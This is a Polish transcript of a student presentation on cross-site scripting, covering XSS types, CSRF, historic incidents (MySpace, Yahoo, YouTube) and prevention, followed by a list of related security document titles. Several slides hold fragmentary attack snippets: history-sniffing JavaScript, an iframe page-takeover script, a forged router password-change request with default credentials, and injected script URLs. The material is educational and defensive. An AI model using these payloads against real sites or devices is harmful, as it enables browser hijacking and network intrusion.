ATAKI TYPU CROSS-SITE SCRIPTING
|
|
- Nadzieja Kozak
- 7 lat temu
- Przeglądów:
Transkrypt
1 ATAKI TYPU CROSS-SITE SCRIPTING Michał Korecki Kierujący pracą: prof. dr hab. inż. Zbigniew Kotulski
2 PLAN PREZENTACJI 1. Cel pracy i motywacja 2. Co to jest XSS? 3. Praca 4. Przykłady
3 CEL PRACY I MOTYWACJA Cel: Zdefiniowanie narzędzi służących testowaniu i zabezpieczeo aplikacji internetowych Zapoznanie z metodami przeprowadzania ataków XSS Analiza zagrożeo będących konsekwencją udanego ataku XSS Opracowanie zaleceo i rad zwiększających bezpieczeostwo aplikacji internetowych oraz zwykłych użytkowników Motywacja: Ataki XSS są niedocenianą metodą przeprowadzania ataków Brak poważnej literatury w języku polskim traktującej o XSS
4 MOTYWACJA
5 CROSS-SITE SCRIPTING Osadzenie w treści strony kodu (zazwyczaj JavaScript), który wyświetlony innym żytkownikom może doprowadzid do wykonania przez nich niepożądanych akcji. Atak na użytkownika, nie na serwer aplikacji. Serwer jest pośrednikiem. Cross-Site Scripting = XSS Cascading Style Sheets = CSS
6 JAK TO NAZWAĆ? Unauthorized Site Scripting Unofficial Site Scripting Uniform Resource Locator (URL) Parameter Script Insertion Cross-Site Scripting Synthesized Scripting Fraudulent Scripting fraudulent oszukaoczy, fałszywy, nieuczciwy
7 TYPY ATAKÓW XSS Non-persistent XSS Persistent XSS DOM-Based XSS Przekierowania CSRF Inne (PDF, CSS, obrazki, omijanie filtrów danych)
8 NON-PERSISTENT XSS
9 PERSISTENT XSS
10 CSRF CROSS SITE REQUEST FORGERY
11 PRZYKŁADOWE ATAKI Kradzież historii Stałe zalogowanie Atak na intranet Przejęcie przeglądarki Skanowanie wewnętrznej sieci Zdalna zmiana hasła routera w wewnętrznej sieci Wymazywanie strony
12 KRADZIEŻ HISTORII var websites = [ " ]; var link = document.createelement("a"); link.href = websites[0]; link.innerhtml = websites[0]; document.body.appendchild(link); var color = document.defaultview.getcomputedstyle(link,null).getpropertyvalue("color"); if(color == "rgb(85, 26, 139)") {... }
13 KRADZIEŻ HISTORII CD
14 STAŁE ZALOGOWANIE Wykorzystanie konsoli błędów JavaScript <script src= >
15 ATAK NA INTRANET Scenariusz: Ofiara odwiedza zainfekowaną stronę lub klika w spreparowany link Ujawnienie wewnętrznego adresu IP ofiary Odkrycie interfejsów maszyn istniejących w sieci Przeprowadzenie dokładnych ataków
16 ATAK NA INTRANET CD Przejęcie kontroli nad przeglądarką = dostęp do cookies, monitorowanie danych wprowadzanych za pomocą klawiatury, wiedza o odwiedzanych stronach. Zapewnienie ciągłej kontroli nad przeglądarką dzięki odpowiednio przygotowanej ramce iframe.
17 ATAK NA INTRANET CD var iframe = document.createelement("iframe"); iframe.setattribute("src","/"); iframe.setattribute("id",'watched'); iframe.setattribute("frameborder", "0"); iframe.setattribute("onload","readviewport()"); iframe.setattribute("scrolling","no"); iframe.setattribute("onunload",""); iframe.style.border = '0px'; iframe.style.left = '0px'; iframe.style.top = '0px'; iframe.style.width = (window.innerwidth - 20) + 'px'; iframe.style.height = '2000px'; iframe.style.position = 'absolute'; iframe.style.visibility = 'visible'; iframe.style.zindex = '100000'; document.body.innerhtml = ''; document.body.appendchild(iframe);
18 ATAK NA INTRANET CD Kolejne kroki: Funkcja przechwytująca każde kliknięcie użytkownika i przesyłająca je dalej Odkrycie odresu IP w sieci wewnętrznej applet Java ( Skanowanie sieci wewnętrznej w poszukiwaniu działających maszyn/serwerów
19 ATAK NA INTRANET CD Konkretny atak: router wewnętrznej sieci LAN Zazwyczaj lub Login: admin Hasło: password Odpowiednio spreparowane żądanie protokołu HTTP ord&sysnewpasswd=newpassword&sysconfirmpasswd=newpassw ord&cfalert_apply=apply
20 WYMAZYWANIE STRONY Oficjalna strona Marii Szarapowej, kwiecieo 2007 rok %3E%3C/script%3E%3Cscript%20src= pload/story.js%3e%3c/script%3e%3c!--&pagenumber=1 parametr page: // --></script><script src= Treśd umieszczona zamiast prawdziwej zawartości strony informowała fanów tenisistki, że ta rezygnuje z tenisowej kariery, ponieważ chce zostad ekspertem bezpieczeostwa oraz że poczyniła ku temu pierwsze kroki zdając egzamin CISCO CCIE.
21 YAMANNER (YAHOO!) Czerwiec 2006 roku Interfejs webowy kont pocztowych Yahoo! Kod umieszczony w treści wiadomości Wystarczyło otwarcie wiadomości Luka w mechanizmie sprawdzającym kod HTML i JS Mechanizm usuwał znaczniki onload i target Infekcja 200 tys. Użytkowników w 2 dni
22 YAMANNER (YAHOO!) CD Wprowadzony kod: <img src=' target=""onload="// złośliwy kod //"> Wynik: <img src=' onload="// złośliwy kod //">
23 SAMY IS MY HERO (MYSPACE) 4 października 2005 roku Rozprzestrzeniał się infekując profile użytkowników Wysłanie zaproszenia do autora Dodanie wpisu na profilu: but most of all, samy is my hero Każda osoba oglądająca profil stawała się ofiarą Infekcja ponad miliona użytkowników DoS
24 YOUTUBE (JUSTIN BIEBER) Kod w komentarzach Informacja o śmierci artysty Przekierowanie na strony pornograficzne Zablokowanie wyświetlania komentarzy po 2h
25 YOUTUBE (JUSTIN BIEBER) CD
26 ZAPOBIEGANIE ATAKOM Filtrowanie danych pochodzących od użytkownika Kod HTML dostarczany przez użytkownika Bezpieczeostwo przeglądarki internetowej Podejrzane strony WWW Poczta elektroniczna Długie i krótkie adresy URL
27 ADRESY I PRZEKIEROWANIA Krótkie: Długie: data:text/javascript;charset=utf- 8,%2F%2F%20Hello%20XSS%0A%2F%2F%0A%2F%2F%20%3D%3DUser Script%3D%3D%0A%2F%2F%20%40name%20Hello%20XSS%0A%2F%2 F%20%40description%20Skrypt%20zmienia%20zawartosc%20element ow%20%3ch1%3e%0a%2f%2f%20%40include%20http%3a%2f%2f*% 0A%2F%2F%20%40exclude%20http%3A%2F%2Flocalhost%2F*%0A%2F %2F%20%40exclude%20http%3A%2F%2F %2F*%0A%2F%2F% 20%3D%3D%2FUserScript%3D%3D%0Avar%20h1array%20%3D%20doc ument.getelementsbytagname('h1')%3b%0afor%20(var%20i%20%3d %200%3B%20i%20%3C%20h1array.length%3B%20i%2B%2B)%0Ah1arr ay%5b0%5d.innerhtml%20%3d%20'hello%20xss'%3b%0a//.user.js Top 10: Things Only Men Can Do 98% Of people Can t STOP LAUGHING at this Video!!
28 DZIĘKUJĘ
Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework
Uniwersytet Zielonogórski Wydział Elektrotechniki, Informatyki i Telekomunikacji Aplikacje webowe w obliczu ataków internetowych na przykładzie CodeIgniter Framework mgr inż. Łukasz Stefanowicz dr inż.
Bardziej szczegółowoAtaki na aplikacje WWW. Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW
Ataki na aplikacje WWW Łomem, czy wytrychem? Jak dobrać się do aplikacji WWW Ataki na aplikację Ataki na przeglądarkę Ataki na serwer WWW/kontener, etc. Często kombinacja i wiele etapów Którędy do środka
Bardziej szczegółowoOWASP OWASP. The OWASP Foundation http://www.owasp.org. Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek
Cross-Site Scripting Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of
Bardziej szczegółowoDrobne błędy w portalach WWW
Drobne błędy w portalach WWW Borys Łącki http://www.logicaltrust.net XIX Górska Szkoła Informatyki / Szczyrk, 23-26.06.2008 r. LogicalTrust wyizolowany departament bezpieczeństwa IT Business Consulting
Bardziej szczegółowoZagrożenia związane z udostępnianiem aplikacji w sieci Internet
Zagrożenia związane z udostępnianiem aplikacji w sieci Internet I Ogólnopolska Konferencja Informatyki Śledczej Katowice, 8-9 stycznia 2009 Michał Kurek, Aleksander Ludynia Cel prezentacji Wskazanie skali
Bardziej szczegółowoAspekty bezpieczeństwa aplikacji internetowych
Aspekty bezpieczeństwa aplikacji internetowych Kamil Witecki (kamil@witecki.net.pl) Wojciech Wodo (wojciech.wodo@gmail.com) 21 kwietnia 2010 Kto, co, dlaczego? Popularne typy ataków Kim jesteśmy i dlaczego
Bardziej szczegółowoHosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas)
Hosting WWW Bezpieczeństwo hostingu WWW Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Najgroźniejsze ataki na serwer WWW Najgroźniejsze ataki na serwer WWW Cross-site scripting (XSS) SQL injection Denial
Bardziej szczegółowoBezpieczeństwo systemów komputerowych
Bezpieczeństwo systemów komputerowych Zagrożenia dla aplikacji internetowych Aleksy Schubert (Marcin Peczarski) Instytut Informatyki Uniwersytetu Warszawskiego 15 grudnia 2015 Lista zagadnień Wstrzykiwanie
Bardziej szczegółowoKurs rozszerzony języka Python
Środowisko Django, cz. 3 19 stycznia 2018 Plan wykładu 1 2 Konstrukcja formularzy Walidacja i zapis 3 Ograniczenie dostępu 4 Plan wykładu 1 2 Konstrukcja formularzy Walidacja i zapis 3 Ograniczenie dostępu
Bardziej szczegółowoProgram szkolenia: Bezpieczny kod - podstawy
Program szkolenia: Bezpieczny kod - podstawy Informacje: Nazwa: Kod: Kategoria: Grupa docelowa: Czas trwania: Forma: Bezpieczny kod - podstawy Arch-Sec-intro Bezpieczeństwo developerzy 3 dni 75% wykłady
Bardziej szczegółowoThe OWASP Foundation http://www.owasp.org. Session Management. Sławomir Rozbicki. slawek@rozbicki.eu
The OWASP Foundation http://www.owasp.org Session Management Sławomir Rozbicki slawek@rozbicki.eu 28-07-2011 OWASP TOP 10 A1: Injection A2: Cross-Site Scripting (XSS) A3: Broken Authentication and Session
Bardziej szczegółowoTytuł prezentacji. Wykrywanie cyberzagrożeń typu Drive-by Download WIEDZA I TECHNOLOGIA. Piotr Bisialski Security and Data Center Product Manager
Wykrywanie cyberzagrożeń typu Drive-by Download Piotr Bisialski Security and Data Center Product Manager WIEDZA I TECHNOLOGIA Hosting Meeting Wrocław 26 stycznia 2012 Zagrożenia w Internecie Tytuł Atak
Bardziej szczegółowoBezpieczeństwo aplikacji internetowych
Bezpieczeństwo internetowych Marek Zachara http://marek.zachara.name 1/23 Aplikacje internetowe znajdują się pod ciągłym 'ostrzałem' Jest to wynikiem skali: ponad 3 mld użytkowników sieci 900 mln 'hostnames'
Bardziej szczegółowoBezpieczeństwo portali społecznościowych w ujęciu robaków Web 2.0
Bezpieczeństwo portali społecznościowych w ujęciu robaków Web 2.0 09.10.2008 Borys Łącki 1 2 Robak komputerowy samoreplikujący się program komputerowy... XSS/CSRF WORM!= Blaster, Sasser, Mydoom, Slammer.
Bardziej szczegółowoSnifery wbudowane w Microsoft Windows
Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany
Bardziej szczegółowoPORADNIKI. Cross-site Scripting
PORADNIKI Cross-site Scripting Wprowadzenie Zastanawiam się jak często odbierasz e-mail z hiperłączem. Wyobraź sobie,że odebrałeś wiadomość z linkiem do strony twojego banku online, ze stwierdzeniem,że
Bardziej szczegółowoZarządzanie sesją w aplikacjach Internetowych. Kraków, 2008-10-23 Paweł Goleń
Zarządzanie sesją w aplikacjach Internetowych Kraków, 2008-10-23 Paweł Goleń Agenda Po co sesje w aplikacjach internetowych Sposoby przekazywania identyfikatorów Sposoby ochrony Cookie Analiza identyfikatora
Bardziej szczegółowoBezpieczeństwo portali społecznościowych w ujęciu robaków Web 2.0
Bezpieczeństwo portali społecznościowych w ujęciu robaków Web 2.0 2009.03.13 / Pingwinaria Borys Łącki 1 2 2007: ilość ruchu WWW przekroczyła ilość ruchu P2P 3 Internet Warstwa WWW (filtry wejścia/wyjścia)
Bardziej szczegółowoPrzykład konfiguracji koncentratora SSL VPN w trybie Reverse Proxy (dotyczy serii urządzeń ZyWALL USG)
Przykład konfiguracji koncentratora SSL VPN w trybie Reverse Proxy (dotyczy serii urządzeń ZyWALL USG) Technologii SSL VPN pozwala nam realizować bezpieczny zdalny dostęp do zasobów naszej sieci lokalnej.
Bardziej szczegółowoAjax a bezpieczeństwo aplikacji webowych. Jakub Wierzgała
Ajax a bezpieczeństwo aplikacji webowych Jakub Wierzgała Web 2.0 2 grudnia 2008r. Ajax a bezpieczeństwo aplikacji webowych 2 Web 2.0 Zawartość tworzona przez uŝytkowników Wysoka interaktywność Aplikacja
Bardziej szczegółowoAplikacje WWW. Krzysztof Ciebiera. 3 kwietnia 2014
Aplikacje WWW Krzysztof Ciebiera 3 kwietnia 2014 Bezpieczeństwo Clickjacking CSRF Cross site scripting (XSS) Migracje ContentType Tłumaczenia Testowanie - RequestFactory Clickjacking Użytkownik odwiedza
Bardziej szczegółowoBezpieczeństwo frameworków WEBowych Java na przykładzie ataku XSS
Bezpieczeństwo frameworków WEBowych Java na przykładzie ataku XSS O mnie 12 lat doświadczenia w systemach WEB Developer, Technical Leader, Project Manager Java/JEE (ISC)2 CISSP CTO w J-LABS Dygresja Dygresja
Bardziej szczegółowoWykorzystanie nowoczesnych technik ataku do zdobycia poufnych danych Bezpieczeństwo systemów sieciowych - Projekt
Wykorzystanie nowoczesnych technik ataku do zdobycia poufnych danych Bezpieczeństwo systemów sieciowych - Projekt Paweł Szołtysek Streszczenie W ostatnim okresie można zaobserwoważ znaczy rozwój nowoczesnych
Bardziej szczegółowoPolityka prywatności dla strony ELCEN Sp. z o.o. z siedzibą w Gdyni
Polityka prywatności dla strony http://elcen.eu ELCEN Sp. z o.o. z siedzibą w Gdyni ELCEN Sp. z o.o. z siedzibą w Gdyni przestrzega przepisów w zakresie ochrony danych osobowych klientów, kontrahentów
Bardziej szczegółowoOCHRONA PRZED RANSOMWARE
OCHRONA PRZED RANSOMWARE Konfiguracja ustawień Wprowadzanie zmian i proponowanych w niniejszym dokumencie polityk bezpieczeństwa polecamy wyłącznie administratorom, posiadającym szczegółową wiedzę nt swojej
Bardziej szczegółowoPrzekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek
Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek Router jest podłączony do sieci Internet, natomiast od dostawcy zostaje
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. Forum
Języki programowania wysokiego poziomu Forum Elementy obowiązkowe (2p.) Wyświetlanie wpisów Logowanie/wylogowanie Dodawanie wpisów Rejestracja użytkowników Elementy obowiązkowe (2p.) Wyświetlanie wpisów
Bardziej szczegółowoPrzekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik. Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej:
Przekierowanie portów w routerze TP-LINK na przykładzie kamery Kenik Po co wykonujemy przekierowanie portów? Spójrzmy na rysunek poniżej: Router jest podłączony do sieci Internet, natomiast od dostawcy
Bardziej szczegółowoPanda Managed Office Protection. Przewodnik. Panda Managed Office Protection. Przewodnik
Panda Managed Office Protection. Przewodnik Panda Managed Office Protection Przewodnik Maj 2008 Spis treści 1. Przewodnik po konsoli administracyjnej i monitorującej... 3 1.1. Przegląd konsoli... 3 1.2.
Bardziej szczegółowoPrzygotowanie do nowoczesnego programowania po stronie przeglądarki. (HTML5, CSS3, JS, wzorce, architektura, narzędzia)
Program szkolenia: Przygotowanie do nowoczesnego programowania po stronie przeglądarki (HTML5, CSS3, JS, wzorce, architektura, narzędzia) Informacje: Nazwa: Kod: Kategoria: Grupa docelowa: Czas trwania:
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. Blog
Języki programowania wysokiego poziomu Blog Elementy obowiązkowe (2p.) Wyświetlanie wpisów Logowanie/wylogowanie Dodawanie wpisów Elementy obowiązkowe (2p.) Wyświetlanie wpisów - wszystkie wpisy na jednej
Bardziej szczegółowoKompresja stron internetowych
Kompresja stron internetowych Patryk Jar Tech 3 Camp, 18 czerwca 2013 r. O mnie Patryk Jar Webdeveloper Nor-sta (nor-sta.eu) yarpo.pl 2 3 Agenda Lepszy kod w przeglądarce Mniej żądań HTTP Mniej danych
Bardziej szczegółowoANALIZA BEZPIECZEŃSTWA SIECI MPLS VPN. Łukasz Polak Opiekun: prof. Zbigniew Kotulski
ANALIZA BEZPIECZEŃSTWA SIECI MPLS VPN Łukasz Polak Opiekun: prof. Zbigniew Kotulski Plan prezentacji 2 1. Wirtualne sieci prywatne (VPN) 2. Architektura MPLS 3. Zasada działania sieci MPLS VPN 4. Bezpieczeństwo
Bardziej szczegółowoAgenda. Rys historyczny Mobilne systemy operacyjne
Mobilne zagrożenia Artur Maj, Prevenity Agenda Telefony komórkowe Rys historyczny Mobilne systemy operacyjne Bezpieczeństwo urządzeń smartphone Smartphone w bankowości Zagrożenia dla bankowości Demonstracja
Bardziej szczegółowoWybrane działy Informatyki Stosowanej
Wybrane działy Informatyki Stosowanej JSP - Java Server Pages dr hab. inż. Andrzej Czerepicki a.czerepicki@wt.pw.edu.pl http://www2.wt.pw.edu.pl/~a.czerepicki 2019 Aplikacje i skrypty WWW klasyfikacja
Bardziej szczegółowoInstrukcja użytkowania platformy ONLINE. Akademii Doskonalenia Zawodowego NATUROPATA ADZ Naturopata
Instrukcja użytkowania platformy ONLINE Akademii Doskonalenia Zawodowego NATUROPATA 2016 ADZ Naturopata SPIS TREŚCI Rozdział 1. Wymagania techniczne.... 4 1. System operacyjny.... 4 2. Przeglądarka internetowa....
Bardziej szczegółowoOpen(Source) Web Application Security Project
Open(Source) Web Application Security Project 2014-05-14 Wojciech Dworakowski, SecuRing Poland Chapter Leader Copyright The Foundation Permission is granted to copy, distribute and/or modify this document
Bardziej szczegółowoSUM Edukacja Techniczno Informatyczna Języki i Systemy Programowania. Wykład 2. dr Artur Bartoszewski - WYKŁAD: Języki i Systemy Programowania,
SUM Edukacja Techniczno Informatyczna Języki i Systemy Programowania Wykład 2 1 SUM Edukacja Techniczno Informatyczna Języki i Systemy Programowania Przekierowania 2 Przekierowanie za pomocą skryptu Przykład
Bardziej szczegółowoLogowanie do systemu SL2014
Logowanie do systemu SL2014 Rzeszów, 2-4.11.2016 r. Departament Zarządzania Regionalnym Programem Operacyjnym Urząd Marszałkowski Województwa Podkarpackiego Plan prezentacji: Ogólne informacje o systemie
Bardziej szczegółowoOCHRONA PRZED RANSOMWARE. Konfiguracja ustawień
OCHRONA PRZED RANSOMWARE Konfiguracja ustawień SPIS TREŚCI: Wstęp...................... 3 Dlaczego warto korzystać z dodatkowych ustawień...... 3 Konfiguracja ustawień programów ESET dla biznesu......
Bardziej szczegółowoWprowadzenie do kryptografii i bezpieczeństwa. Po raz czwarty
Wprowadzenie do kryptografii i bezpieczeństwa Po raz czwarty WWW i e-mail WWW HTTPS & SSL doesn't mean "trust this." It means "this is private." You may be having a private conversation with Satan. Hanselman
Bardziej szczegółowoNiektóre typowe cechy wiadomości typu phishing to:
Phishing to przesyłanie wiadomości, które rzekomo pochodzą z godnych zaufania źródeł np. banków. W rzeczywistości służą one pozyskiwaniu poufnych danych od użytkowników. W tego rodzaju wiadomościach umieszczany
Bardziej szczegółowoO stronach www, html itp..
O stronach www, html itp.. Prosty wstęp do podstawowych technik spotykanych w internecie 09.01.2015 M. Rad Plan wykładu Html Przykład Strona www Xhtml Css Php Js HTML HTML - (ang. HyperText Markup Language)
Bardziej szczegółowoAgenda. Quo vadis, security? Artur Maj, Prevenity
Quo vadis, security? Artur Maj, Prevenity Agenda 1. Bezpieczeostwo informacji rys historyczny 2. Najistotniejsze wyzwania bezpieczeostwa - obecnie i w najbliższym czasie 3. Nasze rekomendacje 1 Bezpieczeostwo
Bardziej szczegółowoDodawanie nowego abonenta VOIP na serwerze Platan Libra
Dodawanie nowego abonenta VOIP na serwerze Platan Libra Wstęp: Celem ćwiczenia jest ustawienie nowego abonenta VOIP w centrali Platan Libra, oraz konfiguracja programu do połączeń VOIP na komputerze i
Bardziej szczegółowoSystem kontroli dostępu ACCO NET Instrukcja instalacji
System kontroli dostępu ACCO NET Instrukcja instalacji acco_net_i_pl 12/14 SATEL sp. z o.o. ul. Budowlanych 66 80-298 Gdańsk POLSKA tel. 58 320 94 00 serwis 58 320 94 30 dz. techn. 58 320 94 20; 604 166
Bardziej szczegółowoZagrożenia trywialne. Zagrożenia bezpieczeństwa aplikacji internetowych. Parametry ukryte. Modyfikowanie parametrów wywołania
Zagrożenia trywialne Zagrożenia bezpieczeństwa aplikacji internetowych Rozwiązania charakterystyczne dla fazy rozwoju opisy rozpoznanych błędów, debugging, komentarze poprzednie wersje plików (cp plik.jsp
Bardziej szczegółowoLaboratorium - Poznawanie FTP
Cele Część 1: Korzystanie z usługi FTP z wiersza poleceń. Część 2: Pobranie pliku z serwera FTP za pomocą WS_FTP LE Część 3: Korzystanie z usługi FTP w przeglądarce Scenariusz File Transfer Protocol (FTP)
Bardziej szczegółowoInstrukcja konfiguracji funkcji skanowania
Instrukcja konfiguracji funkcji skanowania WorkCentre M123/M128 WorkCentre Pro 123/128 701P42171_PL 2004. Wszystkie prawa zastrzeżone. Rozpowszechnianie bez zezwolenia przedstawionych materiałów i informacji
Bardziej szczegółowoLaboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego TCP
Laboratorium - Używanie programu Wireshark do obserwacji mechanizmu uzgodnienia trójetapowego Topologia Cele Część 1: Przygotowanie Wireshark do przechwytywania pakietów Wybór odpowiedniego interfejsu
Bardziej szczegółowoTworzenie stron internetowych z wykorzystaniem HTM5, JavaScript, CSS3 i jquery. Łukasz Bartczuk
Tworzenie stron internetowych z wykorzystaniem HTM5, JavaScript, CSS3 i jquery Łukasz Bartczuk Moduł 6 JavaScript w przeglądarce Agenda Skrypty na stronie internetowej Model DOM AJAX Skrypty na stronie
Bardziej szczegółowoLUKI BEZPIECZEŃSTWA W APLIKACJACH INTERNETOWYCH. Waldemar Korłub. Wytwarzanie Aplikacji Internetowych KASK ETI Politechnika Gdańska
LUKI BEZPIECZEŃSTWA Waldemar Korłub W APLIKACJACH INTERNETOWYCH Wytwarzanie Aplikacji Internetowych KASK ETI Politechnika Gdańska OWASP Top 10 2 OWASP: Open Web Application Security Project www.owasp.org
Bardziej szczegółowoLaboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark
Laboratorium - Przechwytywanie i badanie datagramów DNS w programie Wireshark Topologia Cele Część 1: Zapisanie informacji dotyczących konfiguracji IP komputerów Część 2: Użycie programu Wireshark do przechwycenia
Bardziej szczegółowoZawartość specyfikacji:
Zawartość specyfikacji: Wielkość, waga i kodowanie Umieszczanie obrazków w kreacji Elementy niedopuszczalne Nazewnictwo plików Stopka mailingu Nie spełniam wymagań pracodawcy Waga, wielkość i kodowanie
Bardziej szczegółowoWykorzystywanie plików cookies
Polityka Niniejsza Polityka dotyczy plików i odnosi się do stron internetowych w domenie *.rkantor.com, zwanej dalej ( Serwisem ), których właścicielem jest Raiffeisen Solutions Sp. z o. o z siedzibą w
Bardziej szczegółowoInstrukcja obsługi Uczeń. Spis Treści
Instrukcja obsługi Uczeń Spis Treści 1. Rejestracja ucznia... 2 1.1. Rejestracja za pomocą Facebooka (preferowana)... 2 1.2. Rejestracja po przez aplikacje... 4 2. Logowanie... 4 3. Wygląd głównego Menu...
Bardziej szczegółowoAnaliza skuteczności zabezpieczeń przed atakami na aplikacje Web
Opracował: dr inŝ. Mariusz Stawowski F5 Certified Product Consultant, ASM Email: mariusz.stawowski@clico.pl Zabezpieczenia sieciowe Firewall i Intrusion Prevention System (IPS) są podstawą do tworzenia
Bardziej szczegółowoBezpieczeństwo frameworków WEBowych Java na przykładzie ataku CSRF
Bezpieczeństwo frameworków WEBowych Java na przykładzie ataku CSRF O mnie 12 lat doświadczenia w systemach WEB Java/JEE (ISC) 2 CISSP CTO w J-LABS GET / HTTP/1.1 Host: bank.pl User-Agent: Mozilla/5.0
Bardziej szczegółowoOpis Przedmiotu Zamówienia na przeprowadzenie testów bezpieczeństwa systemu wspomagania nadzoru archiwalnego e-nadzór
S t r o n a ǀ 1 z 5 Załącznik nr 1 do zapytania ofertowego Opis Przedmiotu Zamówienia na przeprowadzenie testów bezpieczeństwa systemu wspomagania nadzoru archiwalnego e-nadzór I. Definicje. 1. Dostawca
Bardziej szczegółowoLaboratorium - Konfiguracja ustawień przeglądarki w Windows Vista
5.0 5.3.2.8 Laboratorium - Konfiguracja ustawień przeglądarki w Windows Vista Wprowadzenie Wydrukuj i uzupełnij to laboratorium. W tym laboratorium, będziesz konfigurować ustawienia przeglądarki Microsoft
Bardziej szczegółowoLaboratorium nr 4 - Badanie protokołów WWW
Data ćwiczenia: 29.03.2017 Prowadzący: dr inż. Piotr Kurowski Przedmiot: Sieci komputerowe i bazy danych Wykonawca: Klaudia Gurbiel Kierunek: Inżynieria mechatroniczna Rok III, Semestr VI Laboratorium
Bardziej szczegółowoNarzędzia OWASP dla developerów OWASP ESAPI & AppSensor OWASP 2011-11-23. The OWASP Foundation http://www.owasp.org
Narzędzia dla developerów ESAPI & AppSensor 2011-11-23 Wojciech Dworakowski Poland Chapter Leader SecuRing wojciech.dworakowski@owasp.org +48506184550 Copyright The Foundation Permission is granted to
Bardziej szczegółowoOWASP. The Open Web Application Security Project. OWASP Top 10 2010 rc1. Dziesięć najbardziej krytycznych zagrożeń w web aplikacjach
OWASP The Open Web Application Security Project OWASP Top 10 2010 rc1 Dziesięć najbardziej krytycznych zagrożeń w web aplikacjach Release Candidate 1 (tłum.+ zmiany: Michał Wiczyński, http://thinklikeninja.blogspot.com)
Bardziej szczegółowoInstrukcja korzystania z systemu IPbaza. oraz konfiguracji urządzeń
Instrukcja korzystania z systemu IPbaza oraz konfiguracji urządzeń -1- Spis treści 1 Wstęp...3 2 Aktywacja usługi udostępniania portów u dostawcy...3 3 Rejestracja nowego konta i logowanie...4 4 Dodawanie
Bardziej szczegółowoTomasz Grześ. Systemy zarządzania treścią, cz. II
Tomasz Grześ Systemy zarządzania treścią, cz. II Panel administracyjny Panel administracyjny pozwala na zarządzanie wszystkimi elementami pakietu, m.in. zarządzanie użytkownikami, edycję stron, instalowanie
Bardziej szczegółowoPrzekierowanie portów w routerze - podstawy
Przekierowanie portów w routerze - podstawy Wyobraźmy sobie, że posiadamy sieć domową i w tej sieci pracują dwa komputery oraz dwie kamery IP. Operator dostarcza nam łącze internetowe z jednym adresem
Bardziej szczegółowoProjektowani Systemów Inf.
Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych
Bardziej szczegółowoŹródła. cript/1.5/reference/ Ruby on Rails: http://www.rubyonrails.org/ AJAX: http://www.adaptivepath.com/publications/e ssays/archives/000385.
Źródła CSS: http://www.csszengarden.com/ XHTML: http://www.xhtml.org/ XML: http://www.w3.org/xml/ PHP: http://www.php.net/ JavaScript: http://devedgetemp.mozilla.org/library/manuals/2000/javas cript/1.5/reference/
Bardziej szczegółowoSpecyfikacja techniczna kreacji HTML5
Specyfikacja techniczna kreacji HTML5 www.gemius.pl Parametry przekazywane do kreacji Kreacje HTML osadzane są na stronie za pomocą znacznika . W adresie do pliku kreacji przekazywane są parametry
Bardziej szczegółowoInPro RCP WEB moduł sieciowy do oprogramowania InPro RCP
InPro RCP WEB moduł sieciowy do oprogramowania InPro RCP InPro RCP Web InPro RCP Web jest systemem napisanym w technologi webowej. Umożliwia zdalne połączenie przez przeglądarkę internetową z bazą InPro
Bardziej szczegółowoProste kody html do szybkiego stosowania.
Proste kody html do szybkiego stosowania. Często, w trakcie pracy z blogiem czy portalem zachodzi potrzeba umieszczenia grafiki, linku zaszytego w grafice czy innych podobnych. Szczególnie w widgetach
Bardziej szczegółowoZastosowanie darmowych rozwiązań do testów użyteczności aplikacji internetowych
Zastosowanie darmowych rozwiązań do testów użyteczności aplikacji internetowych Konferencja SQAM 2008 Agenda Proces Projektowanie zorientowane na użytkownika 2. Dla początkujących : ) zlastrona.org; 3.
Bardziej szczegółowoEdytor Edit+ - dodawanie zdjęć i. załączników. Instrukcja użytkownika
Edytor Edit+ - dodawanie zdjęć i załączników Instrukcja użytkownika Maj 2015 SPIS TREŚCI SPIS TREŚCI... 2 Tworzenie zdjęć... 3 Tworzenie załączników... 6 Strona 2 z 10 Tworzenie zdjęć Aby dodać do strony
Bardziej szczegółowoInternetowy System Zgłoszeń Postępowanie Kwalifikacyjne w Służbie Cywilnej PRZEWODNIK
Internetowy System Zgłoszeń Postępowanie Kwalifikacyjne w Służbie Cywilnej PRZEWODNIK Wstęp...1 Zakładanie konta...3 Aktywowanie konta...3 Wypełnianie formularza zgłoszenia...5 Drukowanie formularza zgłoszenia...6
Bardziej szczegółowopomocą programu WinRar.
1. Pobieramy oprogramowanie dla kamery ze strony. Z menu produkty wybieramy swój model kamery. Następnie na podstronie produktu wybieramy zakładkę [POMOC] - klikamy symbol szarej strzałki aby rozpocząć
Bardziej szczegółowoPOLITYKA PLIKÓW COOKIES
POLITYKA PLIKÓW COOKIES Niniejsza Polityka została wydana przez MSI ( MSI, my, nas i nasze ). Witryny internetowe, do których odnosi się ta Polityka Niniejsza Polityka odnosi się do wszystkich witryn i
Bardziej szczegółowoSkrócona instrukcja obsługi rejestratorów marki IPOX
Skrócona instrukcja obsługi rejestratorów marki IPOX v 1.1, 07-09-2015 1 Spis treści 1. Pierwsze uruchomienie...3 2. Logowanie i przegląd menu rejestratora...4 3. Ustawienia nagrywania...6 4. Odtwarzanie
Bardziej szczegółowoPrzewodnik użytkownika (instrukcja) AutoMagicTest Spis treści
